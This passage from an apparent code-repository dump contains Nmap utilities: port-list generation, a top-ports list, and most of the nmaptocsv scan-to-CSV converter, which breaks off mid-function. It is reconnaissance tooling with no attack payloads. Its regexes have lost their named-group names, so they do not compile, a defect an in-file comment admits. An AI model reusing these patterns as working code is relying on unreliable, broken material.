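                out.write(record + "\n")
    finally:
        if out is not None:
            out.close()
    return targets


#Main function
output_file = ""
input_file = args.inputfile.encode('utf-8')
if args.outfile:
    output_file = args.outfile
targets = parse_nmap_xml(input_file, output_file)


# /nmap-files/nmap-port-gen.py
#!/usr/bin/python
ports = ["3-4","6-7","19-26","32-33","42-43","79-85","88-90","99-100","109-111","143-144","211-212","254-256","406-407","416-417","443-445","464-465","512-515","543-545","554-555","616-617","666-668","800-801","900-903","911-912","992-993","999-1002","1009-1011","1021-1100","1104-1108","1110-1114","1121-1124","1130-1132","1137-1138","1147-1149","1151-1152","1163-1166","1174-1175","1185-1187","1198-1199","1216-1218","1233-1234","1247-1248","1271-1272","1300-1301","1309-1311","1433-1434","1500-1501","1687-1688","1717-1721","1782-1783","1839-1840","1862-1864","1971-1972","1998-2010","2020-2022","2033-2035","2040-2043","2045-2049","2099-2100","2105-2107","2160-2161","2190-2191","2381-2383","2393-2394","2601-2602","2604-2605","2607-2608","2701-2702","2717-2718","2909-2910","2967-2968","3000-3001","3005-3007","3030-3031","3260-3261","3268-3269","3300-3301","3322-3325","3369-3372","3389-3390","3689-3690","3800-3801","3826-3828","4000-4006","4125-4126","4443-4446","4899-4900","5000-5004","5050-5051","5060-5061","5100-5102","5221-5222","5225-5226","5431-5432","5678-5679","5800-5802","5810-5811","5900-5904","5906-5907","5910-5911","5959-5963","5987-5989","5998-6007","6100-6101","6565-6567","6666-6669","6788-6789","7000-7002","7200-7201","7777-7778","7920-7921","7937-7938","7999-8002","8007-8011"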
,"8021-8022","8080-8090","8099-8100","8180-8181","8192-8194","8290-8292","8651-8652","9000-9003","9009-9011","9080-9081","9090-9091","9099-9103","9110-9111","9502-9503","9593-9595","9876-9878","9943-9944","9998-10004","10009-10010","10024-10025","10616-10617","10628-10629","11110-11111","13782-13783","14441-14442","15002-15004","16000-16001","16992-16993","20221-20222","25734-25735","27352-27353","27355-27356","32768-32785","34571-34573","44442-44443","49152-49161","49175-49176","49999-50003","55055-55056","56737-56738"] 3 | f = open("out.txt","a") 4 | for rport in ports: 5 | ssp = rport.split("-") 6 | for i in range(int(ssp[0]),int(ssp[1])+1): 7 | print i 8 | f.write(str(i)+"\n") 9 | f.close() 10 | -------------------------------------------------------------------------------- /nmap-files/nmap-top-ports.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 3 3 | 4 4 | 6 5 | 7 6 | 9 7 | 13 8 | 17 9 | 19 10 | 20 11 | 21 12 | 22 13 | 23 14 | 24 15 | 25 16 | 26 17 | 30 18 | 32 19 | 33 20 | 37 21 | 42 22 | 43 23 | 49 24 | 53 25 | 70 26 | 79 27 | 80 28 | 81 29 | 82 30 | 83 31 | 84 32 | 85 33 | 88 34 | 89 35 | 90 36 | 99 37 | 100 38 | 106 39 | 109 40 | 110 41 | 111 42 | 113 43 | 119 44 | 125 45 | 135 46 | 139 47 | 143 48 | 144 49 | 146 50 | 161 51 | 163 52 | 179 53 | 199 54 | 211 55 | 212 56 | 222 57 | 254 58 | 255 59 | 256 60 | 259 61 | 264 62 | 280 63 | 301 64 | 306 65 | 311 66 | 340 67 | 366 68 | 389 69 | 406 70 | 407 71 | 416 72 | 417 73 | 425 74 | 427 75 | 443 76 | 444 77 | 445 78 | 458 79 | 464 80 | 465 81 | 481 82 | 497 83 | 500 84 | 512 85 | 513 86 | 514 87 | 515 88 | 524 89 | 541 90 | 543 91 | 544 92 | 545 93 | 548 94 | 554 95 | 555 96 | 563 97 | 587 98 | 593 99 | 616 100 | 617 101 | 625 102 | 631 103 | 636 104 | 646 105 | 648 106 | 666 107 | 667 108 | 668 109 | 683 110 | 687 111 | 691 112 | 700 113 | 705 114 | 711 115 | 714 116 | 720 117 | 722 118 | 726 119 | 749 120 | 765 121 | 777 122 | 783 123 | 787 124 | 800 125 | 
801 126 | 808 127 | 843 128 | 873 129 | 880 130 | 888 131 | 898 132 | 900 133 | 901 134 | 902 135 | 903 136 | 911 137 | 912 138 | 981 139 | 987 140 | 990 141 | 992 142 | 993 143 | 995 144 | 999 145 | 1000 146 | 1001 147 | 1002 148 | 1007 149 | 1009 150 | 1010 151 | 1011 152 | 1021 153 | 1022 154 | 1023 155 | 1024 156 | 1025 157 | 1026 158 | 1027 159 | 1028 160 | 1029 161 | 1030 162 | 1031 163 | 1032 164 | 1033 165 | 1034 166 | 1035 167 | 1036 168 | 1037 169 | 1038 170 | 1039 171 | 1040 172 | 1041 173 | 1042 174 | 1043 175 | 1044 176 | 1045 177 | 1046 178 | 1047 179 | 1048 180 | 1049 181 | 1050 182 | 1051 183 | 1052 184 | 1053 185 | 1054 186 | 1055 187 | 1056 188 | 1057 189 | 1058 190 | 1059 191 | 1060 192 | 1061 193 | 1062 194 | 1063 195 | 1064 196 | 1065 197 | 1066 198 | 1067 199 | 1068 200 | 1069 201 | 1070 202 | 1071 203 | 1072 204 | 1073 205 | 1074 206 | 1075 207 | 1076 208 | 1077 209 | 1078 210 | 1079 211 | 1080 212 | 1081 213 | 1082 214 | 1083 215 | 1084 216 | 1085 217 | 1086 218 | 1087 219 | 1088 220 | 1089 221 | 1090 222 | 1091 223 | 1092 224 | 1093 225 | 1094 226 | 1095 227 | 1096 228 | 1097 229 | 1098 230 | 1099 231 | 1100 232 | 1102 233 | 1104 234 | 1105 235 | 1106 236 | 1107 237 | 1108 238 | 1110 239 | 1111 240 | 1112 241 | 1113 242 | 1114 243 | 1117 244 | 1119 245 | 1121 246 | 1122 247 | 1123 248 | 1124 249 | 1126 250 | 1130 251 | 1131 252 | 1132 253 | 1137 254 | 1138 255 | 1141 256 | 1145 257 | 1147 258 | 1148 259 | 1149 260 | 1151 261 | 1152 262 | 1154 263 | 1163 264 | 1164 265 | 1165 266 | 1166 267 | 1169 268 | 1174 269 | 1175 270 | 1183 271 | 1185 272 | 1186 273 | 1187 274 | 1192 275 | 1198 276 | 1199 277 | 1201 278 | 1213 279 | 1216 280 | 1217 281 | 1218 282 | 1233 283 | 1234 284 | 1236 285 | 1244 286 | 1247 287 | 1248 288 | 1259 289 | 1271 290 | 1272 291 | 1277 292 | 1287 293 | 1296 294 | 1300 295 | 1301 296 | 1309 297 | 1310 298 | 1311 299 | 1322 300 | 1328 301 | 1334 302 | 1352 303 | 1417 304 | 1433 305 | 1434 306 | 1443 307 | 1455 308 | 1461 
309 | 1494 310 | 1500 311 | 1501 312 | 1503 313 | 1521 314 | 1524 315 | 1533 316 | 1556 317 | 1580 318 | 1583 319 | 1594 320 | 1600 321 | 1641 322 | 1658 323 | 1666 324 | 1687 325 | 1688 326 | 1700 327 | 1717 328 | 1718 329 | 1719 330 | 1720 331 | 1721 332 | 1723 333 | 1755 334 | 1761 335 | 1782 336 | 1783 337 | 1801 338 | 1805 339 | 1812 340 | 1839 341 | 1840 342 | 1862 343 | 1863 344 | 1864 345 | 1875 346 | 1900 347 | 1914 348 | 1935 349 | 1947 350 | 1971 351 | 1972 352 | 1974 353 | 1984 354 | 1998 355 | 1999 356 | 2000 357 | 2001 358 | 2002 359 | 2003 360 | 2004 361 | 2005 362 | 2006 363 | 2007 364 | 2008 365 | 2009 366 | 2010 367 | 2013 368 | 2020 369 | 2021 370 | 2022 371 | 2030 372 | 2033 373 | 2034 374 | 2035 375 | 2038 376 | 2040 377 | 2041 378 | 2042 379 | 2043 380 | 2045 381 | 2046 382 | 2047 383 | 2048 384 | 2049 385 | 2065 386 | 2068 387 | 2099 388 | 2100 389 | 2103 390 | 2105 391 | 2106 392 | 2107 393 | 2111 394 | 2119 395 | 2121 396 | 2126 397 | 2135 398 | 2144 399 | 2160 400 | 2161 401 | 2170 402 | 2179 403 | 2190 404 | 2191 405 | 2196 406 | 2200 407 | 2222 408 | 2251 409 | 2260 410 | 2288 411 | 2301 412 | 2323 413 | 2366 414 | 2381 415 | 2382 416 | 2383 417 | 2393 418 | 2394 419 | 2399 420 | 2401 421 | 2492 422 | 2500 423 | 2522 424 | 2525 425 | 2557 426 | 2601 427 | 2602 428 | 2604 429 | 2605 430 | 2607 431 | 2608 432 | 2638 433 | 2701 434 | 2702 435 | 2710 436 | 2717 437 | 2718 438 | 2725 439 | 2800 440 | 2809 441 | 2811 442 | 2869 443 | 2875 444 | 2909 445 | 2910 446 | 2920 447 | 2967 448 | 2968 449 | 2998 450 | 3000 451 | 3001 452 | 3003 453 | 3005 454 | 3006 455 | 3007 456 | 3011 457 | 3013 458 | 3017 459 | 3030 460 | 3031 461 | 3052 462 | 3071 463 | 3077 464 | 3128 465 | 3168 466 | 3211 467 | 3221 468 | 3260 469 | 3261 470 | 3268 471 | 3269 472 | 3283 473 | 3300 474 | 3301 475 | 3306 476 | 3322 477 | 3323 478 | 3324 479 | 3325 480 | 3333 481 | 3351 482 | 3367 483 | 3369 484 | 3370 485 | 3371 486 | 3372 487 | 3389 488 | 3390 489 | 3404 490 | 
3476 491 | 3493 492 | 3517 493 | 3527 494 | 3546 495 | 3551 496 | 3580 497 | 3659 498 | 3689 499 | 3690 500 | 3703 501 | 3737 502 | 3766 503 | 3784 504 | 3800 505 | 3801 506 | 3809 507 | 3814 508 | 3826 509 | 3827 510 | 3828 511 | 3851 512 | 3869 513 | 3871 514 | 3878 515 | 3880 516 | 3889 517 | 3905 518 | 3914 519 | 3918 520 | 3920 521 | 3945 522 | 3971 523 | 3986 524 | 3995 525 | 3998 526 | 4000 527 | 4001 528 | 4002 529 | 4003 530 | 4004 531 | 4005 532 | 4006 533 | 4045 534 | 4111 535 | 4125 536 | 4126 537 | 4129 538 | 4224 539 | 4242 540 | 4279 541 | 4321 542 | 4343 543 | 4443 544 | 4444 545 | 4445 546 | 4446 547 | 4449 548 | 4550 549 | 4567 550 | 4662 551 | 4848 552 | 4899 553 | 4900 554 | 4998 555 | 5000 556 | 5001 557 | 5002 558 | 5003 559 | 5004 560 | 5009 561 | 5030 562 | 5033 563 | 5050 564 | 5051 565 | 5054 566 | 5060 567 | 5061 568 | 5080 569 | 5087 570 | 5100 571 | 5101 572 | 5102 573 | 5120 574 | 5190 575 | 5200 576 | 5214 577 | 5221 578 | 5222 579 | 5225 580 | 5226 581 | 5269 582 | 5280 583 | 5298 584 | 5357 585 | 5405 586 | 5414 587 | 5431 588 | 5432 589 | 5440 590 | 5500 591 | 5510 592 | 5544 593 | 5550 594 | 5555 595 | 5560 596 | 5566 597 | 5631 598 | 5633 599 | 5666 600 | 5678 601 | 5679 602 | 5718 603 | 5730 604 | 5800 605 | 5801 606 | 5802 607 | 5810 608 | 5811 609 | 5815 610 | 5822 611 | 5825 612 | 5850 613 | 5859 614 | 5862 615 | 5877 616 | 5900 617 | 5901 618 | 5902 619 | 5903 620 | 5904 621 | 5906 622 | 5907 623 | 5910 624 | 5911 625 | 5915 626 | 5922 627 | 5925 628 | 5950 629 | 5952 630 | 5959 631 | 5960 632 | 5961 633 | 5962 634 | 5963 635 | 5987 636 | 5988 637 | 5989 638 | 5998 639 | 5999 640 | 6000 641 | 6001 642 | 6002 643 | 6003 644 | 6004 645 | 6005 646 | 6006 647 | 6007 648 | 6009 649 | 6025 650 | 6059 651 | 6100 652 | 6101 653 | 6106 654 | 6112 655 | 6123 656 | 6129 657 | 6156 658 | 6346 659 | 6389 660 | 6502 661 | 6510 662 | 6543 663 | 6547 664 | 6565 665 | 6566 666 | 6567 667 | 6580 668 | 6646 669 | 6666 670 | 6667 671 | 6668 672 
| 6669 673 | 6689 674 | 6692 675 | 6699 676 | 6779 677 | 6788 678 | 6789 679 | 6792 680 | 6839 681 | 6881 682 | 6901 683 | 6969 684 | 7000 685 | 7001 686 | 7002 687 | 7004 688 | 7007 689 | 7019 690 | 7025 691 | 7070 692 | 7100 693 | 7103 694 | 7106 695 | 7200 696 | 7201 697 | 7402 698 | 7435 699 | 7443 700 | 7496 701 | 7512 702 | 7625 703 | 7627 704 | 7676 705 | 7741 706 | 7777 707 | 7778 708 | 7800 709 | 7911 710 | 7920 711 | 7921 712 | 7937 713 | 7938 714 | 7999 715 | 8000 716 | 8001 717 | 8002 718 | 8007 719 | 8008 720 | 8009 721 | 8010 722 | 8011 723 | 8021 724 | 8022 725 | 8031 726 | 8042 727 | 8045 728 | 8080 729 | 8081 730 | 8082 731 | 8083 732 | 8084 733 | 8085 734 | 8086 735 | 8087 736 | 8088 737 | 8089 738 | 8090 739 | 8093 740 | 8099 741 | 8100 742 | 8180 743 | 8181 744 | 8192 745 | 8193 746 | 8194 747 | 8200 748 | 8222 749 | 8254 750 | 8290 751 | 8291 752 | 8292 753 | 8300 754 | 8333 755 | 8383 756 | 8400 757 | 8402 758 | 8443 759 | 8500 760 | 8600 761 | 8649 762 | 8651 763 | 8652 764 | 8654 765 | 8701 766 | 8800 767 | 8873 768 | 8888 769 | 8899 770 | 8994 771 | 9000 772 | 9001 773 | 9002 774 | 9003 775 | 9009 776 | 9010 777 | 9011 778 | 9040 779 | 9050 780 | 9071 781 | 9080 782 | 9081 783 | 9090 784 | 9091 785 | 9099 786 | 9100 787 | 9101 788 | 9102 789 | 9103 790 | 9110 791 | 9111 792 | 9200 793 | 9207 794 | 9220 795 | 9290 796 | 9415 797 | 9418 798 | 9485 799 | 9500 800 | 9502 801 | 9503 802 | 9535 803 | 9575 804 | 9593 805 | 9594 806 | 9595 807 | 9618 808 | 9666 809 | 9876 810 | 9877 811 | 9878 812 | 9898 813 | 9900 814 | 9917 815 | 9929 816 | 9943 817 | 9944 818 | 9968 819 | 9998 820 | 9999 821 | 10000 822 | 10001 823 | 10002 824 | 10003 825 | 10004 826 | 10009 827 | 10010 828 | 10012 829 | 10024 830 | 10025 831 | 10082 832 | 10180 833 | 10215 834 | 10243 835 | 10566 836 | 10616 837 | 10617 838 | 10621 839 | 10626 840 | 10628 841 | 10629 842 | 10778 843 | 11110 844 | 11111 845 | 11967 846 | 12000 847 | 12174 848 | 12265 849 | 12345 850 | 13456 851 
| 13722 852 | 13782 853 | 13783 854 | 14000 855 | 14238 856 | 14441 857 | 14442 858 | 15000 859 | 15002 860 | 15003 861 | 15004 862 | 15660 863 | 15742 864 | 16000 865 | 16001 866 | 16012 867 | 16016 868 | 16018 869 | 16080 870 | 16113 871 | 16992 872 | 16993 873 | 17877 874 | 17988 875 | 18040 876 | 18101 877 | 18988 878 | 19101 879 | 19283 880 | 19315 881 | 19350 882 | 19780 883 | 19801 884 | 19842 885 | 20000 886 | 20005 887 | 20031 888 | 20221 889 | 20222 890 | 20828 891 | 21571 892 | 22939 893 | 23502 894 | 24444 895 | 24800 896 | 25734 897 | 25735 898 | 26214 899 | 27000 900 | 27352 901 | 27353 902 | 27355 903 | 27356 904 | 27715 905 | 28201 906 | 30000 907 | 30718 908 | 30951 909 | 31038 910 | 31337 911 | 32768 912 | 32769 913 | 32770 914 | 32771 915 | 32772 916 | 32773 917 | 32774 918 | 32775 919 | 32776 920 | 32777 921 | 32778 922 | 32779 923 | 32780 924 | 32781 925 | 32782 926 | 32783 927 | 32784 928 | 32785 929 | 33354 930 | 33899 931 | 34571 932 | 34572 933 | 34573 934 | 35500 935 | 38292 936 | 40193 937 | 40911 938 | 41511 939 | 42510 940 | 44176 941 | 44442 942 | 44443 943 | 44501 944 | 45100 945 | 48080 946 | 49152 947 | 49153 948 | 49154 949 | 49155 950 | 49156 951 | 49157 952 | 49158 953 | 49159 954 | 49160 955 | 49161 956 | 49163 957 | 49165 958 | 49167 959 | 49175 960 | 49176 961 | 49400 962 | 49999 963 | 50000 964 | 50001 965 | 50002 966 | 50003 967 | 50006 968 | 50300 969 | 50389 970 | 50500 971 | 50636 972 | 50800 973 | 51103 974 | 51493 975 | 52673 976 | 52822 977 | 52848 978 | 52869 979 | 54045 980 | 54328 981 | 55055 982 | 55056 983 | 55555 984 | 55600 985 | 56737 986 | 56738 987 | 57294 988 | 57797 989 | 58080 990 | 60020 991 | 60443 992 | 61532 993 | 61900 994 | 62078 995 | 63331 996 | 64623 997 | 64680 998 | 65000 999 | 65129 1000 | 65389 1001 | -------------------------------------------------------------------------------- /nmap-files/nmaptocsv.py: -------------------------------------------------------------------------------- 1 | 
#!/usr/bin/env python
# -*- coding: utf-8 -*-

# This file is part of nmaptocsv.
#
# Copyright (C) 2012, Thomas Debize
# All rights reserved.
#
# nmaptocsv is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# nmaptocsv is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with nmaptocsv.  If not, see <http://www.gnu.org/licenses/>.

# Global imports
import csv
import itertools
import re
import socket
import struct
import sys

# OptionParser imports
from optparse import OptionParser

# Options definition
# One dict per command-line switch: 'name' is the (short, long) flag pair and
# the remaining keys use optparse's add_option() keyword names (help, nargs,
# action).
option_0 = {
    'name': ('-i', '--input'),
    'help': 'Nmap scan output file (stdin if not specified)',
    'nargs': 1,
}
option_1 = {
    'name': ('-o', '--output'),
    'help': 'csv output filename (stdout if not specified)',
    'nargs': 1,
}
option_2 = {
    'name': ('-f', '--format'),
    'help': 'csv column format { fqdn, hop_number, ip, mac_address, mac_vendor, port, protocol, os, service, version } (default : ip-fqdn-port-protocol-service-version)',
    'nargs': 1,
}
option_3 = {
    'name': ('-n', '--newline'),
    'help': 'insert a newline between each host for better readability',
    'action': 'count',
}
option_4 = {
    'name': ('-s', '--skip-header'),
    'help': 'do not print the csv header',
    'action': 'count',
}
option_5 = {
    'name': ('-d', '--delimiter'),
    'help': 'Delimiter to use in CSV (semicolon if not specified)',
    'nargs': 1,
}

# Registration order of the switches (this is the order they appear in --help).
options = [option_0, option_1, option_2, option_3, option_4, option_5]

# Format option
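DEFAULT_FORMAT = 'ip-fqdn-port-protocol-service-version'
SUPPORTED_FORMAT_OBJECTS = [ 'fqdn', 'hop_number', 'ip', 'mac_address', 'mac_vendor', 'port', 'protocol', 'os', 'service', 'version' ]
INVALID_FORMAT = 10
VALID_FORMAT = 11

# Newline option
NO_NEWLINE = 20
YES_NEWLINE = 21

# Header option
NO_HEADER = 22
YES_HEADER = 23

# Handful patterns
# All patterns are raw strings: they contain \s, \d, \( ... which Python
# would otherwise flag as invalid escapes (SyntaxWarning on recent versions).
# The bytes handed to re are identical to the non-raw originals.
#
# NOTE(review): every named group below reads "(?P...)" in this copy -- the
# "<name>" part was lost when the file was rendered, so as written these
# patterns do not compile.  The group names must be restored from the
# upstream nmaptocsv source before use; they are looked up by name through
# extract_matching_pattern() further down.
#-- IP regex
p_ip_elementary = r'(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})'
# Deliberately starts without the opening "(" -- the caller wraps it in "((...))".
p_mac_elementary = r'[0-9a-fA-F][0-9a-fA-F]:){5}([0-9a-fA-F][0-9a-fA-F]'

# Nmap Normal Output patterns
#-- Target
p_ip_nmap5 = r'Interesting.*on\s(?:(?P.*) (?=\((?P%s)\)))|Interesting.*on\s(?P.*)\:' % p_ip_elementary
p_ip_nmap6 = r'Nmap.*for\s(?:(?P.*) (?=\((?P%s)\)))|Nmap.*for\s(?P%s)$' % (p_ip_elementary, p_ip_elementary)

p_ip = re.compile('%s|%s' % (p_ip_nmap5, p_ip_nmap6))

#-- Port finding
p_port = re.compile(r'^(?P[\d]+)\/(?Ptcp|udp)\s+(?:open|open\|filtered)\s+(?P[\w\S]*)(?:\s*(?P.*))?$')

#-- MAC address
p_mac = re.compile(r'MAC Address:\s(?P(%s))\s\((?P.*)\)' % p_mac_elementary)

#-- OS detection (pattern order is important, the latter position the more precise and reliable the information is)
p_os = re.compile(r'(?:^Service Info: OS|^OS|^OS details|smb-os-discovery|\|\s+OS):\s(?P[^;]+)')

#-- Network distance
p_network_dist = re.compile(r'Network Distance:\s(?P\d+)\shops?')

# Nmap Grepable output
#-- Target, Ports
p_grepable = re.compile(r'(?P^Host:\s.*)')


# Handful functions
def dottedquad_to_num(ip):
    """
    Convert decimal dotted quad string IP to long integer

    @param ip : IPv4 address as a dotted-quad string, e.g. '10.0.0.1'

    @rtype : the address as an unsigned 32-bit integer (network byte order)
    """
    return struct.unpack('!L', socket.inet_aton(ip))[0]

def num_to_dottedquad(n):
    """
    Convert long int IP to dotted quad string

    @param n : IPv4 address as an unsigned 32-bit integer

    @rtype : the address as a dotted-quad string
    """
    return socket.inet_ntoa(struct.pack('!L', n))

def unique_match_from_list(list):
    """
    Check the list for a potential pattern match

    @param list : a list of potential matching groups (the parameter shadows
                  the builtin; the name is kept for call compatibility)

    @rtype : return the unique value that matched, or nothing if nothing matched
    """
    # Later non-None entries overwrite earlier ones, so the *last* match wins;
    # '' means that nothing matched at all.
    result = ''
    for item in list:
        if item is not None:
            result = str(item)

    return result

def extract_matching_pattern(regex, group_name, unfiltered_list):
    """
    Return the desired group_name from a list of matching patterns

    @param regex : a regular expression with named groups
    @param group_name : the desired matching group name value
    @param unfiltered_list : a list of matches

    @rtype : the string value, or '' unless exactly one entry matched
    """
    result = ''
    # A list comprehension rather than filter(): filter() is lazy on Python 3,
    # which would break the len() check below.
    filtered_list = [entry for entry in unfiltered_list if regex.search(entry)]

    if len(filtered_list) == 1:
        result = regex.search(filtered_list[0]).group(group_name)

    return result

class Host:
    """One scanned host: its addresses, open ports and the details Nmap reported."""

    def __init__(self, ip, fqdn=''):
        self.ip_dottedquad = ip
        self.ip_num = dottedquad_to_num(ip)  # numeric form of the same address
        self.fqdn = fqdn
        self.ports = []  # Port objects, in the order they were added
        self.os = ''
        self.mac_address = ''
        self.mac_address_vendor = ''
        self.network_distance = ''

    def add_port(self, port):
        """Append a Port object to this host."""
        self.ports.append(port)

    # Getters
    def get_ip_num_format(self):
        return str(self.ip_num)

    def get_ip_dotted_format(self):
        return str(self.ip_dottedquad)

    def get_fqdn(self):
        return str(self.fqdn)

    def get_port_list(self):
        return self.ports

    def _port_attribute_list(self, getter):
        """
        Collect one attribute from every port

        @param getter : callable taking a Port and returning the wanted value

        @rtype : list with one entry per port, or [''] when the host has no
                 ports so that callers always get at least one value
        """
        port_list = self.get_port_list()
        if not port_list:
            return ['']
        return [getter(port) for port in port_list]

    def get_port_number_list(self):
        return self._port_attribute_list(lambda port: port.get_number())

    def get_port_protocol_list(self):
        return self._port_attribute_list(lambda port: port.get_protocol())

    def get_port_service_list(self):
        return self._port_attribute_list(lambda port: port.get_service())

    def get_port_version_list(self):
        return self._port_attribute_list(lambda port: port.get_version())

    def get_os(self):
        return str(self.os)

    def get_mac_address(self):
        return str(self.mac_address)

    def get_mac_address_vendor(self):
        return str(self.mac_address_vendor)

    def get_network_distance(self):
        return str(self.network_distance)

    # Setters
    def set_fqdn(self, fqdn):
        self.fqdn = fqdn

    def set_os(self, os):
        self.os = os

    def set_mac(self, mac_address, mac_address_vendor = ''):
        self.mac_address = mac_address
        self.mac_address_vendor = mac_address_vendor

    def set_network_distance(self, network_distance):
        self.network_distance = network_distance

class Port:
    """One port line of a scan: number, protocol and the detected service/version."""

    def __init__(self, number, protocol, service, version):
        self.number = number
        self.protocol = protocol
        self.service = service
        self.version = version

    def get_number(self):
        return self.number

    def get_protocol(self):
        return self.protocol

    def get_service(self):
        return self.service

    def get_version(self):
        return self.version

def split_grepable_match(raw_string) :
    """
    Split the raw line to a neat Host object

    @param raw_string : the whole 'Host' line

    @rtype : return an Host object
    """
    global p_ip_elementary

    splitted_fields = raw_string.split("\t")

    # 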
Patterns 249 | p_host = re.compile('Host:\s(?P%s)\s+\((?P|.*)\)' % p_ip_elementary) 250 | p_ports = re.compile('Ports:\s+(?P.*)') 251 | p_os = re.compile('OS:\s(?P.*)') 252 | 253 | # Extracted named-group matches 254 | IP_str = extract_matching_pattern(p_host, 'ip', splitted_fields) 255 | FQDN_str = extract_matching_pattern(p_host, 'fqdn', splitted_fields) 256 | ports_str = extract_matching_pattern(p_ports, 'ports', splitted_fields) 257 | OS_str = extract_matching_pattern(p_os, 'os', splitted_fields) 258 | 259 | current_host = Host(IP_str, FQDN_str) 260 | current_host.set_os(OS_str) 261 | 262 | # Let's split the raw port list 263 | all_ports = ports_str.split(', ') 264 | 265 | # Keep only open ports 266 | open_ports_list = filter(lambda p: '/open/' in p, all_ports) 267 | 268 | for open_port in open_ports_list : 269 | splitted_fields = open_port.split('/',6) 270 | 271 | # Extract each field from the format [port number / state / protocol / owner / service / rpc info / version info] 272 | #-- Thanks to http://www.unspecific.com/nmap-oG-output/ 273 | number, state, protocol, owner, service, version = splitted_fields[0:6] 274 | 275 | new_port = Port(number, protocol, service, version) 276 | 277 | current_host.add_port(new_port) 278 | 279 | 280 | return current_host 281 | 282 | def parse(fd) : 283 | """ 284 | Parse the data according to several regexes 285 | 286 | @param fd : input file descriptor, could be a true file or stdin 287 | 288 | @rtype : return a list of objects indexed from their numerical IP representation 289 | """ 290 | global p_ip_elementary, p_ip, p_port, p_grepable 291 | 292 | IPs = {} 293 | last_host = None 294 | 295 | lines = [l.rstrip() for l in fd.readlines()] 296 | for line in lines: 297 | # 1st case: Nmap Normal Output 298 | #-- 1st action: Grab the IP 299 | IP = p_ip.search(line) 300 | if IP: 301 | # Check out what patterns matched 302 | IP_potential_match = [IP.group('ip_nmap5'), IP.group('ip_only_nmap5'), IP.group('ip_nmap6'), 
IP.group('ip_only_nmap6')] 303 | IP_str = unique_match_from_list(IP_potential_match) 304 | 305 | FQDN_potential_match = [IP.group('fqdn_nmap5'), IP.group('fqdn_nmap6')] 306 | FQDN_str = unique_match_from_list(FQDN_potential_match) 307 | 308 | new_host = Host(IP_str, FQDN_str) 309 | 310 | IPs[new_host.get_ip_num_format()] = new_host 311 | 312 | last_host = new_host 313 | 314 | 315 | # 1st case: Nmap Normal Output 316 | #-- 2nd action: Grab the port 317 | port = p_port.search(line) 318 | if port and last_host != None: 319 | number = str(port.group('number')) 320 | protocol = str(port.group('protocol')) 321 | service = str(port.group('service')) 322 | version = str(port.group('version')) 323 | version = re.sub(r'syn-ack ttl \d+ ', "", version) 324 | version = re.sub(r'syn-ack ttl \d+', "", version) 325 | version = re.sub(r'udp-response ttl \d+ ', "", version) 326 | version = re.sub(r'udp-response ttl \d+', "", version) 327 | if (len(version)==0): 328 | version = " " 329 | new_port = Port(number, protocol, service, version ) 330 | 331 | last_host.add_port(new_port) 332 | 333 | 334 | # 1st case: Nmap Normal Output 335 | #-- 3rd action: Grab the MAC address 336 | mac = p_mac.search(line) 337 | if mac: 338 | last_host.set_mac(str(mac.group('mac_addr')), str(mac.group('mac_vendor'))) 339 | 340 | 341 | # 1st case: Nmap Normal Output 342 | #-- 4th action: Grab the OS detection 343 | os = p_os.search(line) 344 | if os: 345 | last_host.set_os(str(os.group('os'))) 346 | 347 | 348 | # 1st case: Nmap Normal Output 349 | #-- 5th action: Grab the network distance 350 | network_distance = p_network_dist.search(line) 351 | if network_distance: 352 | last_host.set_network_distance(str(network_distance.group('hop_number'))) 353 | 354 | 355 | # 2nd case: Nmap Grepable Output 356 | #-- 1 sole action: Grab the whole line for further splitting 357 | grepable = p_grepable.search(line) 358 | if grepable : 359 | if grepable.group('whole_line') : 360 | new_host = 
split_grepable_match(grepable.group('whole_line')) 361 | 362 | # Update the occurence found with 'Status: Up' 363 | IPs[new_host.get_ip_num_format()] = new_host 364 | 365 | last_host = new_host 366 | 367 | return IPs 368 | 369 | def check_supplied_format(fmt): 370 | """ 371 | Check for the supplied custom output format 372 | 373 | @param fmt : the supplied format 374 | 375 | @rtype : VALID_FORMAT or INVALID_FORMAT 376 | """ 377 | global SUPPORTED_FORMAT_OBJECTS, INVALID_FORMAT, VALID_FORMAT 378 | result = INVALID_FORMAT 379 | 380 | splitted_fmt = fmt.split('-') 381 | 382 | for fmt_object in splitted_fmt : 383 | if not(fmt_object in SUPPORTED_FORMAT_OBJECTS): 384 | break 385 | else : 386 | result = VALID_FORMAT 387 | 388 | return result 389 | 390 | def formatted_item(host, format_item): 391 | """ 392 | return the attribute value related to the host 393 | 394 | @param host : host object 395 | @param format_item : the attribute supplied in the custom format 396 | 397 | @rtype : the attribute value 398 | """ 399 | if isinstance(host, Host) : 400 | option_map = { 401 | 'fqdn' : [host.get_fqdn()], 402 | 'hop_number': [host.get_network_distance()], 403 | 'ip' : [host.get_ip_dotted_format()], 404 | 'mac_address': [host.get_mac_address()], 405 | 'mac_vendor': [host.get_mac_address_vendor()], 406 | 'os' : [host.get_os()], 407 | 'port': host.get_port_number_list(), 408 | 'protocol': host.get_port_protocol_list(), 409 | 'service': host.get_port_service_list(), 410 | 'version': host.get_port_version_list() 411 | } 412 | 413 | if format_item in option_map.keys(): 414 | return option_map[format_item] 415 | else : 416 | return '' 417 | else : 418 | return [] 419 | 420 | def repeat_attributes(attribute_list): 421 | """ 422 | repeat attribute lists to the maximum for the 423 | 424 | @param attribute_list : raw list with different attribute list length 425 | 426 | @rtype : a list consisting of length equal attribute list 427 | """ 428 | max_number = len(max(attribute_list, key=len)) 
